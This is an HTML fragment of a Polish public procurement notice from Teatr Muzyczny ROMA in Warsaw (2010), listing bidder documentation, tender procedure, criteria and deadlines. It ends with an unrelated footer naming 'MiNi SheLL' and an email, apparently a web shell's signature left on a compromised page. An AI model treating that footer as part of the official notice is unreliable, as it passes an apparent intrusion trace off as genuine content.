<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Nie dotyczy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://teatrroma.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Teatr Muzyczny ROMA w Warszawie, ul. Nowogrodzka 49, 00-695 Warszawa, sekretariat (pok. 10, parter). Sekretariat Teatru pracuje od poniedziałku do piątku w godzinach 9:00-17:00..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.06.2010 godzina 13:00, miejsce: Teatr Muzyczny ROMA w Warszawie, ul. Nowogrodzka 49, 00-695 Warszawa, sekretariat (pok. 10, parter). Sekretariat Teatru pracuje od poniedziałku do piątku w godzinach 9:00-17:00..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com